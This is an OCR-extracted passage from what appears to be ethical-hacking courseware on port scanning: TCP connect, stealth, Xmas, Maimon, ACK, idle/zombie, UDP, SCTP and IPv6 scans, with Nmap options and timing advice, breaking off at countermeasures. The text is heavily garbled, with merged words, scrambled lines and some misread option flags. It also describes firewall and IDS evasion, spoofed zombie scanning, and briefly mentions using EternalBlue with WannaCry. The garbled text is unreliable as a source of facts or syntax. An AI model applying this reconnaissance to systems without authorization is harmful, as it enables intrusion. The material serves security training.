Kerberos
remoteknit
Xaver Kerberos
auth 2i2o/tep Remotekau
ats
age
7000-7009/udp
"7000-7008/udp
‘Andrew
FileSystem
FileSystem
“Andrew
Table
32: table
Reserved
ports
03
Module 282
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
PortScanning
Techniques
Port Scanning
Techniques
Portscanningtechniques
on thetype
of
are
protocol further
as
categorized
described
below.Thiscategorization
usedforcommunication i n thenetwork. isbased
TePScanning:
Open TCPScanning
Methods
©
Stealth
Open
Scan
TCPConnect/Full
Methods
TCPScanning
Half-open Scan
©
TCP
Inverse
Flag
Scan
©
Xmas
*FINScan
Scan
© NULLScan
© Maimon Scan
‘ACK
Flag
©
Scan Probe
TTLBased Scan
© Window
Scan
andSpoofed
‘ThirdParty TCPScanning
Methods
© IDLE/IP
1DScan
Header
ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPScanning:
+
UDPScanning
Scanning:
SCTP
+
SCTPINIT Scanning
=
COOKIE/ECHO
SCTP Scanning
Scanning:
SSDP
=
SSDP
and
Pv6 Scanni
List
Scanning
=
[Pv6Scanning
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPConnect/Full Open
Scan
tvee-way
handshake
‘The
TCPConnectsan detectswhena partsopen afte
competing the
by
T c connectscan estabihesfullconnection andthencloses
connection sending
‘the an RST packet
Iedoesnotrequiresuperuserprivileges
ae
TCPConnect/Full Open
Scan
Source:http://insecure.org
TCPConnect/Full
OpenScanis one of the most reliableformsof TCPscanning. In TCPConnect
scanning, the OS's
on the target
TCP
() call () to of
connect system tries to opena connection
machine.If the portis listening,
everyport interest
the connect callwill resulti n a successful
on
connectionwiththehost that particular
that the portis not reachable.
a three-way
Connectscancompletes
‘TCP handshake
port;otherwise,it wll return an error message
wayhandshake,
packet.
Then,
a SYNpacket,
theclientsends
the clientacknowledges
connection. Oncethe handshake
whichthe recipient
the SYN+ACK
i s completed,
packet acknowledges
a SYN+ACK
to complete
with a n ACKpacket
the scanner sendsan RSTpacket
with
the
to end the
connection
attacker
Scan
when
is
Figure3.3: result a
Target
port open
Sri Packet
+ Port)
Atacker 3.35:Sean
Figure r esultwhena por iclosed
Target
ical andCountermensores
Mackin ©by E-Comel
Copyright
Making
time over a
non-blocking,
Using
()
connect callforeverytargeted
a separate portin a linearmanner
would
a
take long
the scan usingmanysocketsi n parallel
slowconnection.Theattackerc an accelerate
1/0allowsthe attackerto set a shorttime-out period andwatchall the
socketssimultaneously.
In Zenmap, the -e optionis usedto perform TCP Connect/fullopen
sean.
map 3 bats
is penand
3.36:TCPConnect/Fullsean
Figure usingZenmap
‘The
of
this
type
of
scan
drawback thatitis easily
will disclosethe connection, Suchscanning
system
detectable filterable,Thelogs i n the target.
doesnot require superuser privileges.
ical andCountermensores
Mackin ©by E-Comel
Copyright
StealthScan(Half-open
Scan)
ives
the
Steathscanning
abruptly
the
TCP
the esting
betwean centandserve before completion
wayhands sgnal,ths leavingt he
connection
connection
ofhee
halagen
‘tala ue
bypass
firewall
seth canningtechniques
o
eer)
aa. AY
saree
StealthScan(Half-open Scan)
Thestealthscan involvesresetting
beforecompletion
theTCPconnection betweentheclientandthe
ofthethree-way
A stealthscan sendsa single
handshakesignals,hencemakingthe connectionhalf-open.
frameto a TCPportwithout any TCPhandshaking or additional
server
abruptly
packettransfers.
Thehalf-open This
type
ofscansends
scan partially
alsocalleda “SYN
a single
framewith theexpectation
opensa connection but stopshalfway
becauseit only
scan,―
of a single
through.
sendsthe SYNpacket.
response.
Thestealthscanis
Thisprevents the service from
notifying the incomingconnection. TCPSYNor half-open scanningis a stealthmethodof port
scanning.
Thestealthscan alsoimplements the three-way handshakemethodology. In thelaststage, it
examines the packets enteringthe interfaceandterminates the connection beforetriggering a
‘newinitializationto identify
remote ports.Thestealthscan process is describedbelow.
+
The
client
sends a singleSYNpacket to the
Ifthe portis open,the server subsequently
responds
on the
server
with a SYN/ACK
appropriate
packet
port.
‘=
Ifthe server responds
with an RSTpacket,
thenthe remote portis i n the “closed―
state.
The client sendsthe RST packet
to closethe initiation before a connection can be
established.
SYN
80)
“eat
(Poet
ACK Pact
cose
>
Bilt
10.00.2202
wr
337:Portis open
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
S19(Port
Por 8090)
< oo
Attackers
use stealthscanning
techniquesto bypass
firewallrulesandloggingmechanisms, and
theyhide themselvesa s usualundernetworktraffic. In Zenmap,the ~sS optionis usedto
performa stealth
scan/TCP half-open
scan.
rg
40.[40.10-30
Bet
anny $32 riitere
Bae.
Aadenes 807001 29:00:74:93(Ware
1iP
90
Nese-aonel
3.30:TCP
Figure stealth/Half
Open
ical
scan Z enmap
using
‘Aitachars
\©
end
probe
packets
(FIN,
PSH)
with
TEP
no no with2 TCPflag URG, stor fas, Where response
& een
onwopen
Portis closed
InverseTCPFlagScan
AttackerssendTCPprobe packets URG,PSH)
with a TCPflag(FIN, set or with no flags.
Whenthe
portis open,theattacker doesnot getanyresponsefromthe host,whereas whenthe porti s
closed,he or shereceives the RSTfromthe targethost.
I
roteraaanuna/rsaynay
oo
Attacker
K< NoResponse
Target
Host
Figure
340:scan
when
portis fag
Inverse TCP
ProbePacket(FIN/URG/PSH/NULL)
open
st/ack
Target
Host
flagscan whenpots dosed
3.41:inverseTCP
Figure
Security
SYNflag
mechanisms
of the targetedhosts.Programs
scan attempts.
suchas Synlogger
At times,the probe
andCourtney
packets
sent
suchas firewallsandIDSdetectthe SYNpackets to the sensitive ports
are availableto loghalf-open
enabledwith TCPflags can passthrough
filtersundetected,depending on the security
mechanisms installed.
invertedtechnique
‘An involvesprobing a targetusinga half-open SYNflagbecausethe closed
portscan onlysendthe responseback.According to RFC793,a n RST/ACK packet is sent for
ical andCountermensores
Mackin ©by E-Comel
Copyright
connection reset whenthe hostclosesa port.Attackerstakeadvantage of this featureto send
TCPprobe packets to eachportof the targethostwith various TCPflags
s et
Common flag
configurations
usedfor a probepacket
include:
=
=
AFIN
Xmas
An
probe
probe TCP TCP
withtheFIN
with set
flagset
the FIN,URG,
andPUSH flags
=
=
ANULL with
ASYN/ACK
TCP
probe
probe
no flagsset
All closed
portson thetargetedhostwill sendan RST/ACK response.SinceOSs suchas Windows
completelyignoretheRFC793standard, youcannot see the RST/ACK responsewhenconnected
toa closedport on the target
host.However, thistechnique is effectivewhenusedwith UNIX:
basedOSs.
‘Advantages
=
Avoidsmany IDSandlogging highly
systems; stealthy
Disadvantages
=
Needsraw accessto networksockets, privileges
thusrequiringsuper-user
=
Mostlyeffectiveagainst
hostsusinga BSD-derived stack(noteffectiveagainst
TCP/IP
MicrosoftWindowshosts,i n particular)
the probeTCPno
isset, as
NULL on
the
scanning.
If there is
only
the flag
Note: Inverseflagscanning knownas FIN,URG,
packet.
flag flag
itis known
andPSHscanningbased
If
set i n
FIN is set,it
as if
is known FIN scanning,
set, as
and all ofFIN,URG,andPSHare it is known Xmas
scanning.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Xmas Scan
Using
(©
xmas frame ronn
the
ontpot
sa, attachers
send aT toa
Zrmes usingZenmep
xe
XmasScan
Xmasscan is a typeof inverse TCPscanningtechnique with the FIN, URG, andPUSHflags s et to
senda TCPframeto a remote device. hasopened
If thetarget theport,thenyou will receive no
response
system the
from remotesystem.
replywith an RST. has
Ifthe target closed
You can use thisport scanning
find whichhostis up andwhat services it is offering.
the port,thenyou
technique
Thistechnique
will
to scan large
describes
receive
remote
a
networks and
all TCPflagsets.
Whenall flagsare set,some systems hang; the flags
hence, are oftenset i n the nonsense pattern
URG-PSH-FIN, Attackersuse the TCPXmasscan to determineif portsare closedon the target
machinevia the RSTpacket. Thisscan onlyworkswhensystems are compliant with RFC793:
based
TCP/IP work
any
current
version
Microsoft
Windows
implementation. It will not against of
FIN+ URG+ PUSH
acta
No Response
|
—
Attacker
10006
Server
10008:23
3.42;xmasscan whenthe port open
Figure
Attacker
10006
ical andCountermensores
Mackin ©by E-Comel
Copyright
BSDNetworking
Code
Thismethodrelieson the BSDnetworking code.Thus, you can use thisonlyfor UNIXhosts; it
doesnot supportWindows NT. If the user scans any Microsoftsystem,it will showthat all the
onhost
ports the
Transmitting
are open.
Packets
Youcan initializeallthe flags the packet
whentransmitting to a remote host.Ifthe target system
accepts
not
the packet
sendsan RSTflag,
system that
anddoes sendanyresponse,it means
then it implies
that the portis closed,
the portis open.If the target
‘Advantages
=
Itavoids
Disadvantages
TCP IDSand handshake
three-way
Itworks
In Zenmap,
UNIXonly.
on the
perform
the ~sx optionis usedto
platform
Xmas scan whereasthe ~sF and ~sN options
a re
usedto performFINscan andNULLscan,respectively.
Tepe [10101010
Hoss
|| | Senices nmap Ovtps
=
Pons /Heats Topelogy
Hest
Detae Scant
at
Pies
Nese-conei
up)
aad qate tiles
1 iP
tram: C:\progran
post
(1x86)
seames
Wrap
3.44:Xmas
Figure scan outputu singZenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPMaimon Scan
(©
probes,
FIN/ACK
Atachors send andi
RSTOpen|
Filtered,
heres
no response, thepor
then is
butfan packet s sentin then
responce,
the portis closed
open x
eg
TCPMaimon scan
Thisscan technique is very similarto NULL, FIN,and Xmasscan, but the probe usedhere is
FIN/ACK. In most cases,to determine if the portis openor closed, the RSTpacket shouldbe
generated as a responseto a probe request. However, i n many BSD systems,the portis open if,
thepacket getsdropped in response to a probe.
Nmap interpretsport open[filtered
a as whenthereis no responsefromthe Maimonscanprobe
even
after
filtered whentheICMP
Theportis
fromthe targethost.In Zenmap,
(typeas
manyretransmissions.Theportis closedif the probe
unreachable
error
getsa response an RSTpacket.
3,code1,2,3,9,10,or 13)i s returned
the ~sM optionis usedto perform theTCPMaimonscan,
FIN/ACK
Probe
ee No Response
ja) x<
Attacker Target
Figure
3.45:
Maimon
scan
TCP
FIN/ACK
of
pen
port result
Probe
4-4
oe
>
20
I <
RSTpacket
‘Attacker Target
Figure
3.46:
scan
of
TCPMaimon result sed port
ical andCountermensores
Mackin ©by E-Comel
Copyright
FIN/ACK
Probe
ICMPunreachable
error
Attacker Target
© ras010%0
acting
heap 7 fe) at 2039-10-25
Figure3.48:
1? Maman scan portstate in Zenmap
displaying
03
Page
Module 296
tical
Making
and by CountermensoresCopyright©
Comet
ACK FlagProbeScan
sand
\G: Aetackers
TCP
probe
packets
ACK
remotethe
st
header
withan lg toa device, andthen
analyze
sac
|
send
Atackers
ACK withsequence
number,
stateflfrewal'
‘ered
present),
an
no
response
meansimplies
that
probepacket random
whereasan RST
response
nd
thatthe pots nat tered
theports
xe:
>|
ACKFlagProbeScan
sendTCPprobe
Attackers packets
withtheACKfla set to a remote deviceandthenanalyze
the
ofvulnerabilities
or ACKexploits
open closed.
stack.Thus,
to
headerinformation(TTLandWINDOWfield)the receivedRSTpackets
The flagprobe scan the
find out f the portis
withinthe BSD-derived
suchscanningis effectiveonlyon thoseOSsandplatforms
on whichtheBSD
TCP/IP
derives
TCP/IPstacks.
Module
3 295
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
ofACKflag
Categories probe scanninginclude:
=
TiL-basedACKFlag Probescanning
In this scanning technique,
you will first need to sendACKprobe packets(several
thousands)
based
scan.
to the
TCP
ports the
different
received.InZenmap, TTL
field
andthenanalyze
syntaxnmap -tt1
valueoftheRSTpackets
[time] [target] is usedto perform
TTL
Target
Host
349:TLbasedACK
Figure
If the TTLvalueof the RSTpacket
lag
probe
on a particular
sanning
aopen
onthe
value
Figure
3.50:Screenshot
showingthe portbased TTL ofthe RST
packet
In this
example,
TTL
value
of less
port 22 returned
returneda TTLvalueof80,whichis greater
50, whichis than 64;all other ports
than64,Therefore,
port22is open.
ACKFlag
Window-based Probescanning
In this scanning technique,
you will first need to sendACKprobe packets(several
RST TCP
thousands)
use
packets.
when
all ofthe
to different portsandthenanalyze
Theuser can
the windowfieldvalue the received
this scanningtechnique the portsreturn same
TTL
value.
the
~sW
option a scan.
In Zenmap, is usedto perform
cx robe Paces
window
ne
n< RSTResponses
vee
Attacker TargetHost
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure3.52:
Theabovefigure
Screnshoshowing
theopen
portbased
onthewindow
valueofhe AST
showsthat the TTLvaluereturnedfor eachpacket
packet
is the same; hence,
you cannot perform TTL-based ACKflag probe to
scanningfindthe openports.Therefore,
when you observethe windowvalue,the third packet hasa non-zero windowvalue,
whichmeans
error (type
that
theis port open,
closed.If thereisno response
Whenthe returnedRSTvalueis
even aftermanyretransmissionsandan ICMPunreachable
3,code1,2,3,9,10,or 13)isreturned,
zero,is
thenthe port
thenthe ports inferredto be afiltered
im
TCP/ACK
Probe
‘TCP
RSTwith non-zero windowfield
Target
sean
result
open $3:TCPWindow
TCP/ACK
ofan port
Co
Probe
me
Attacker window
TCPRSTwith zero field =
Target
Figure
3: TCPWindow
scan result
of closed
p ort
il
TCPIACK
Probe
Advantage:
‘Thistypeof scan can evadeIDSi n most cases
Disadvantages:
+
Itis extremely
slowandcan exploit
onlyolderOSswith vulnerable
BSO-derived
TCP/IP
ical andCountermensores
Mackin ©by E-Comel
Copyright
Checking
theFiltering ofTarget
Systems Networks
TheACKflagprobe scanningtechniquealso helpsi n checking
the filtering of target
systems
networks.Theattackersendsan ACKprobe to checkthe filtering
packet (firewalls)
mechanism
of packets
employedbythe targetnetwork.
Sending
an ACKprobe
packet
witha randomsequencenumberandgettingno responsefromthe
targetm eansthattheportisfiltered(stateful firewallis present);
an RST fromthetarget
response
means that the portis not filtered(nofirewall is present).
ProbePacket(ACK)
Attacker Target
Host
Flag
‘ACK ProbeScanning
usingNmap
In Zenmap,
the ~sA optionis usedto perform
an ACKflag
probe
scan.
358:ACKFlag
Figure Probe
scanningusingZenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
IDLE/IPID Header Scan
Se er
© ern
sgen ts
wena mice ————
Om.
ron
Sh
address port
TheIDLE/IPID
Headerscan
to a computer
isa TCP scan methodthat you can
to findout whatservicesare available.
use
It offerscomplete a
to send
blindscanning
of a remote host.Mostnetworkservers listenon TCPports,suchas web servers on port80and
spoofed
source
rail
servers
25.
a is
on port A portis considered “open'
way to determinewhether portis open to senda "SYN"(session
port.Thetargetmachine will end backa "SYNACK" (session
is listening
if an application onthe port.One
establishment)packet
requestacknowledgement)
to the
packet
if the portis open or an "RST"(Reset) packet if the portis closed.A machinethat receives an
unsolicitedSYN|ACK
IPpacket
packetwill respond
on theInternethasa “fragment number(IPID).
identification― wil
with an RST.An unsolicitedRST be ignored. Every
TheOSincreasestheIPID
for eachpacket
the
ast probe.
sent;thus,probing
the
an IPID givesan attacker
In Zenmap, ~sT optionis usedto perform the IDLE the
numberof packetssent since
scan.
359:DLE/IPIO
Figure Header
scan usingZenmap
Theattackerperforms
thisscan byimpersonating via spoofing.
anothercomputer Theattacker
doesnot senda packet fromher/his
IP address;
instead,he/sheusesanother oftencalled
host,
a “zombie,―
to scan the remote hostand identify
any open ports.In this attack,
the attacker
ical andCountermensores
Mackin ©by E-Comel
Copyright
expectsthesequencenumbersof the zombiehost,andif the remote hostchecks
theIP of the
the IPof the zombiemachinewill be displayed,
scanningparty,
IDLEScan
number packet
that the
foreach theysend,
the user sent since the lastprobe.
probing IPIDcan tell an attackerhowmanypackets
=
Step2
assigns an
performing
Thefirst stepi n
IPIDpackets incrementally
on a global
zombie.Azombiethat
idle scan is to find a n appropriate
basisis an appropriate
or idle zombiefor
the
idle
performing scan. shorter
attacker-zombie time
interval between
The
thethe
andthe zombie-target,
for request/response
the fasteris the scan.
a IP
andProbeits Current Identification(IPID)
Choose “Zombie―
packet
In the first step,you will sendthe SYN+ACK
Number
to the zombiemachineto probei ts
number.
Here,
IPID
a TCP SYN*ACK probe
the
the
connection (three-way
packetis sentto
handshake)
IPIDnumber
butnot establish
‘As
Figure
360:1
the zombiedoesnot expecta SYN*ACK
OLEscan: Step
Step2
Theattacker
sends
aSYN
of the zombie. to machine
port
80,
spoofing
address
packet the target on theIP
ical andCountermensores
Mackin ©by E-Comel
Copyright
>
range
Zombie
361: Portis open
Figure
hasa "fragment
SinceeveryIPpacket identification―
number, whichincreasesbyone for
every packet the zombiewill now use its next availableIPID,
transmission, i.e., 31338(X
+1).
IdleScan:Step 2.2(Closed Port)
that the porton the targeti s closed.Subsequently,
‘Assume on receivingthe SYNpacket
fromthe attacker(you),the targetwill respond with an RST,
andthe zombie will remain
idlewithout taking
anyfurtheraction.
Zombie
Figure3.62:
Porisclosed
Step3
Now,followstep1 againto probe
the IPID number.
Ito
Probe B
Response:
s+
iPiD-31539
ACKPacket
RSTPacket
IPIDincremented
by
2sincestep1,
0 port80mut beopen
ical andCountermensores
Mackin ©by E-Comel
Copyright
UDPScanning
Mnretecn
eo
"manne
witha
worres
‘Open Thesptemdoesnot
spend mesa
UDPScanning
Scanning
UDPRawICMPPortUnreachable
UDP
port
scanners TCP. use the UDPprotocol
UDPscan,TheUDPprotocol
senda packet
insteadof
can be more challenging
Thereis no three-way
to use thanTCPscanning
but you cannot determinewhetherthe hostis alive, dead,
handshake
because for
the
youcan
or filtered. However,
you can useone ICMPthat checks foropenor closedports.I fyou senda UDPpacket to a port
an
without application boundto it, the IPstackwill return a n ICMPportunreachable
anyportreturns an ICMPerror, it will beclosed,
open or filteredthrough thefirewall
leaving
packet.
the portsthat did not answer if they
If
a re
‘7. xK<
Is
oe
Attacker unreachable
message is received
103.64:UDPscanning
Thishappensbecauseopen portsdo not have to sendan acknowledgement to
in response a
probe,
andclosedportsare not even required
to sendan error packet,
UDPPackets
Source:https://nmap.org
Whenyou senda packet to a closedUDPport,most of the hostssendan TCMP_PORT_UNREACH
you can determinewhethera portis not openif UDPpackets
error. Thus, or ICMPerrors are not
guaranteedto arrive. Thus,UDPscannersof thistypemust implement retransmissionof packets
Command:[ nmap
- -v 10.10.1010
Hosts
|| |
Services nmapOutputPorts/MortsTopelogy
Host
Detsis_ Sc
( nttp
Ping Scan 11:07
at
p.0re ) at 2019-06-67
eed
Initiating UOPSean at 2
Discoveredopen port137/udp10.10.10.10 on
isup
Reapscan report for 10,10.10.18
fost (0.008 latency
PAC
Addcess:00:0C:29:79:02:89(Wware)
fn
2 IP ase
Neap-sones
In addition,this scanningtechnique
3.65:
Figure
is slowbecause
UDP scanning
using Zenmap
it limitsthe ICMPerror messagerate as a
formof compensation to machinesthat applyRFC1812section 4.3.2.8.A remote hostwill
require accessto the raw ICMPsocketto distinguish
closedportsfromunreachable ports,
()andWRITE()Scanning
UDP RECVFROM
Although
non-root users cannot read unreachableport errors directly,
Linux informsyou
Indirectly
whenit receives messages.
=
Example:
For example,
a secondwrite () calltoa closedportwill usually
fail. Various scanners,
suchas Netcatand Pluvialpscan.c, perform recvfrom () on non-blocking UDP
sockets,
and
they
usually
return
EAGAIN ("TryAgain," errno 13)fthe
ical
has
andCountermensores
Mackin ©
ICMP
error
by E-Comel
Copyright
not been receivedor ECONNREFUSED ("Connection refused," errno 111)
otherwise.Thistechnique
is usedfor determining
openportswhennon-root users use ~
1u (UDP).
‘Advantage:
Rootuserscan
also scan) to
force
this
use the -1 (lamer
UDP option process.
‘The
handshake.
can exceed
However,
regard
UDPscan is lessinformalwith
to
if ICMPis responding a
to an open port because
of
there is no overheadof TCP
eachunavailableport,thetotal number frames
that from a TCPscan. Microsoft-basedOSsdo not usuallyimplement any ICMPrate
limiting;
hence, efficiently
thisscanoperatesvery on Windows-based devices.
Disadvantage:
TheUDPscan provides
portinformationonly.If additionalinformation the
the scan must be supplemented
option(-0)
with a version detection of
s can (~sV)
version is needed,
or the OSfingerprinting
TheUDPscan requiresprivileged
the appropriateuser permissions this
access;hence, scanoptionis only available with
on systems
ical andCountermensores
Mackin ©by E-Comel
Copyright
SCTPINIT Scanning
ning(Open)
te
SCTPINIT Scanning
StreamControlTransport Protocol(SCTP)is a reliablemessage-oriented layer
transport protocol.
as tothe
TCP
and
UDPits multi-streamin
Itis used an alternative
of TCP andUDP.SCTP are
similar
tothose
activities
i s specifically
protocols,
usedto perform
as characteristics
multi-homingand
TRANsport
method,
discovering
VoIP, Signaling
SomeSCTPapplications include
(SS7/SIGTRAN)-related
as shownin the screenshot
services. SCTP
below.
IP telephony,and
associationcomprises
7/SIGnaling
System
a four-way
handshake
Po eee)
ical andCountermensores
Mackin ©by E-Comel
Copyright
InSCTP,the INITscanis performedquicklybyscanningthousands of portsper secondon a fast
networknot obstructedbya firewalloffering
a stronger sense of security.
TheSCTP INITscan is
verysimilarto theTCPSYNscan;comparatively, itis alsostealthyandunobtrusive, as it cannot
complete SCTP hencemaking
associations, the connection half-open
Attackerssend INIT chunkto the targethost. If the port is listening
or open, it sendsan
acknowledgement as an INIT#ACK
chunk,
INITChunk
Attacker Target
Host
If thetarget
367:
Figure
is inactive andit
when
SCTP
listening,
is not
isacknowledgement
INT sean result a
thenit sendsa n
(Open)
port stening
as an ABORT
chunk,
>
Attacker
Figure
3.68:SCTP
‘ABORT
Chunk
Afterseveralretransmissions,
if thereis no response,thenthe portis indicatedas a filteredport.
Theportsalsoindicated
exception
SCTP
(type
INITscan,
asa filteredportifthe targetserver
3,code0,1,2,3,9,10,or 13).In Zenmap, responds
with an ICMPunreachable
the ~s¥optionis usedto perform the
Advantages:
'
_INITscan
clearly
statesdifferentiate
between
can
various
open, portssuchas closed,
andfiltered
ical andCountermensores
Mackin ©by E-Comel
Copyright
Poretlel
Completesresolution
hosts
stList,
ONS
of
1
Ini's2"sconnes ports on 10,20.10.10a re ¢iatered
Nesp
gone:
scores |
7
1 IP anned
2K)
in 2.38
Reve: 4
Figure
3.69:SCIPINITscan in Zenmap
3
Module 207
Page tical andCountermensores
Making Copyright©
by Comet
SCTPCOOKIEECHOScanning
ae
&=--B
SCTPCOOKIE ECHO Scanning
SCTP COOKIE
ECHO
ECHO
of
target,
scanis a more advanced
andtarget
COOKIE chunkto the
portit if the
type scan.In thistypeofscan,attackers
onto the portand youwill not receive anyresponse
is open, will silently
sendthe
dropthe packets
fromthetarget.If the targetsendsbackthe
ABORT chunkresponse, thenthe portis considered as a closedport.TheCOOKIE ECHO chunkis
not blocked
the SCTP COOKIE scan.
bynon-stateful
ECHO
firewallrulesetsas i n the INIT
scan, In Zenmap,
Onlyan advanced
the ~8z optionis usedto perform
IDScan detect
the SCTP COOKIE
ECHO
scan, COOKIE
ECHOChunk
>
NO Response
attacker Target
Host
3,70:SCTPCOOKIEECHOscan
Figure result whenporti s open
COOKIEECHOChunk
‘ABORT
Chunk
Attacker
Figure3.71:
SCTPCOOKIE
ECHO
sean
Target
recutwhenpote closed
Host
Advantages:
Theportscanis not as conspicuousastheINIT scan,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Disadvantages:
SCTP COOKIE ECHO scancannot differentiateclearlybetweenopenandfilteredports,
andit showsthe outputas open [filtered
i n bothcases.
Hoss]
4Host
Senices
| OutputPorts/Hosts Topology
Nmap
10:10.10.10
femep-sZ-»
Host
Detatt Scan
Det
® 10101010 Starting map 7.70 ( nttps://nmap.org ) at 2019-06-07
eh Standard Tine
Initiating ARP Ping Scan at 11
Scanning10.19.10.10 [1 port
anes in 2-53
Figure3:72:SCTP
COOKIE-ECHO
scan inZenmap
ical andCountermensores
Mackin ©by E-Comel
Copyright
SSDPandList Scanning
SSDP
Seanning
Debacle
wera conclon UP ott nl ee
‘finmomes
ONsey nto
performed
(a Arevre reshton'
rere am
ery
will
service
query
sent
information
about
UPnP orIPV6
respond
addresses.
to a
associated
with
it.
the This
response
uses
over IPv4
scanning
feature
broadcast
Theattacker SSDP
includes
to detect
that to buffer
overflow
UPnPvulnerabilities mayallowhim/her launch or DoSattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
3.73 UPnPSSOP
Figure M-SEARCH
in Parco Securty
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Target101010.
Command:[map a 10.10.1010
Prete
Wo Services
Nimap Output Hot
Pons/Hort: Topelogy Oetit
Data
Advantages:
using 3.74: st
Figure sean Zenmap
=
Allis scancan perform sanitycheck.
a good
‘The
detects
list
primarily
file. It incorrectly
scan
defined
addresses
command
or option.
repairsthedetected
IP i n the
e rrors to run any “active
line
‘can.
i n an
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPv6Scanning CEH
PvncrasestheP adress
32
bits
128
bts
sie from to to support
more levels
ofares hierarchy
‘tachers
can use the
6 to
option In Zenmap
IPV6 Scanning
spacefrom32 bitsto 128 bitsto supporthigher
IPV6increases the size of the IP address levelsof
the addressing hierarchy. Traditional networkscanningtechniques are computationally less
feasiblebecauseof the larger searchspace (64bits of hostaddressspace, or 2°addresses)
provided byIPV6in a subnet.Scanning theIPV6networkis more difficultandcomplex compared
Attackers of tools
to IPv4. Additionally,
addresses on
a number scanning do not support
needto harvestIPV6 fromnetworktraffic,
pingsweeps IPv6networks.
recorded
andotherheaderlinesi n archivedemailor Usenetnews messagesto identify
logs,or "Receivedfrom"
IPv6addresses for
subsequent portscanning.However, scanning a n IPv6network provides a largenumber ofhosts
subnet;
i na
can one
subnet
host,
can
if an attacker compromise
localmulticastaddress if the hostsnumbers
he/she probe
a re sequential
the “all
or use any regular
hosts"link
scheme. An
needs
to
attacker
subnet.
i n that
analyze 2 addresses to verify
if a particular
At a conservative rate of one probe
openservice is runningon a host
per second,
sucha scan wouldtakeabout 5
to can
billion years complete.
optionis usedto perform
Attackers use Nmap
the IPV6scan.
to perform
IPv6scanning.In Zenmap, the ~6
3.75:
Figure
|Pv6 ScaninZenmap,
ical andCountermensores
Mackin ©by E-Comel
Copyright
ServiceVersionDiscovery
series
information
theirversons
aboutrunning
onatarget system
and
attackers
to
to the
‘of
Slows determine ued
systemparticular
target explots|
of
then he/she
attack
combination with
can easily
theeternalblueanddoublepulsar
perform
help
backdoor
ransomware
a WannaCry
in Metasploit.
the
Theversion
Nmap technique
the
from nothingof
detection
the
TCP
and
UDP
various
services
is
matching
service-probes
but examination
database
are used
forquerying
expressionsfor recognizingandparsing responses.In Zenmap,
the -sV
ports.Theprobes
and
optionis usedto detect
service versions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
©
Zewm
Sean ToolsBrofle Help
Target10.10.1010 Profile:
[hmap2 10.10.1010
Commané:
05
Hoss]
« Host
Senices
| Nmop
OutputPerts/Hosts Topology
map -3V
Host
Detals. Scant
Details
® 10.10.1010 Starting Ninap7.70
nap scan
Host {5 up (0.00145latency)
(
https://nmap.org
report for 10.40.10.10
) at 2019-06-10
results at nttps://nnap.org/subed'
incorrect
1 host up) scenned 13.88 in
03
Module 245
Page tical andCountermensores
Making Copyright©
by Comet
ScanTimeReductionTechniques
Nmap
performance
|© tntimap, accuracy
and
can
beby achievedreducing
the scan ining
Time
Reduction
Techniques
Scan
@ oe once tes
vv«08e
© snap
©sep2rte snd
UO
Optinize Sans @ seanrom a
Favorable
Network Location
@ rcs a
‘Nmap
ScanTime Reduction Techniques
performance
In Nmap,
and
accuracytakehigh
the longscantime, Theimportant
andthis onlyachieved only reducing
priority,
forreducing
techniques the scantime are asfollows: be by
=
OmitNon-criticalTests
Whileperforming
the Nmap
scan,the time complexity
can be reducedbythe following
methods:
©
©
Avoiding
an intense scan only
Thenumberof portsscanned
if
a minimalamount
c an be limitedusingspecific
is
commands.
ofinformation
required,
Theportscan (sn) can be skippedif andonlyif one hasto checkwhetherthehosts
are onlineor not.
© Advancedscan (-sC,sv,
types and ~a)c an beavoided.
‘traceroute,
©. TheDNSresolution shouldbeturnedon onlywhenitis necessary.
Optimize TimingParameters
Nmap
Tocontrolthe scanactivity, the ~" optionforscanningrangingfromhigh-
provides
Thiscan be extremely
levelto low-leveltimingaggressiveness. usefulfor scanninghighly
filterednetworks.
Separate
andOptimize
UDPScans
manyvulnerableservicesuse theUDPprotocol,
‘As scanning theUDPprotocol isvital,and
it should
be scanned separately, as TCPscanshavedifferent performance requirements
Moreover,
and timingcharacteristics. the UDPscan is more affectedbythe ICMPerror
rate-limiting
compared to
the TCPscan.
03
Module Page216 ical andCountermensores
Mackin
©
Copyright
by E-Comel
Upgrade
Nmap
Itis always
advisableto use the upgraded
version of Nmap
as it contains manybugfixes,
importantalgorithmic enhancements,and high-performance featuressuchas local
networkARPscanning,
ExecuteConcurrentNmap Instances
RunningNmap the wholenetwork usually
against makesthe system slowerand less
efficient.Nmapsupportsparallelization
andit can alsobe customized according to
specific
needs.It
a larger
scanning becomes
very of reliability
while
efficientbygetting
group.Theoverallspeed
manygroups andrunning themsimultaneously.
an idea the network
ofthe scancan beimprovedbydividing
it into
Scanfrom a FavorableNetworkLocation
Itis
always
torun host'sto
internalnetwork,
whenperforming
thewhile
advisable Nmap fromthe localnetwork
as it offers defense-in-depth
target i n the
Externalscanning is obligatory
security.
firewalltestingor whenthenetworkshouldbemonitoredfromthe
externalattacker'sviewpoint.
IncreaseAvailableBandwidthandCPUTime
By
is
the
increasing
Thisdone
available
byby a
can be
controlled
or
CPU
new
datapower,time
line
bandwidth
algorithms,running
installing
its own flooding
control
congestion
or
theNmap
stopping
so
scan
any
can bereduced.
applications.
that network
Nmap
can be
prevented. TheNmap
Thisimprovesits accuracy. bandwidthusagecan be tested by
it
running i n the verbosemode~v.
ical andCountermensores
Mackin ©by E-Comel
Copyright
PortScanning
Countermeasures
| sa sedated potest
fread
‘unporscanning aansthotsonthe
t ools ter a l lIMP messagesinbound
MP
ropery
detects
porscanningactvty, Unreachabe
messages) atthe
firewalls
androutes
rowtinemettod salableports
trae ute
uebadrat tere
||FAY asco
Ere opting es
Port ScanningCountermeasures
‘As previously,
discussed a large
portscanningprovides amount of usefulinformation
to the
attacker,suchas IPaddresses, hostnames,openports,andservicesrunningon ports.Openports
offera n easymeans fortheattacker
specifically to breakinto thenetwork.
However,thereis no
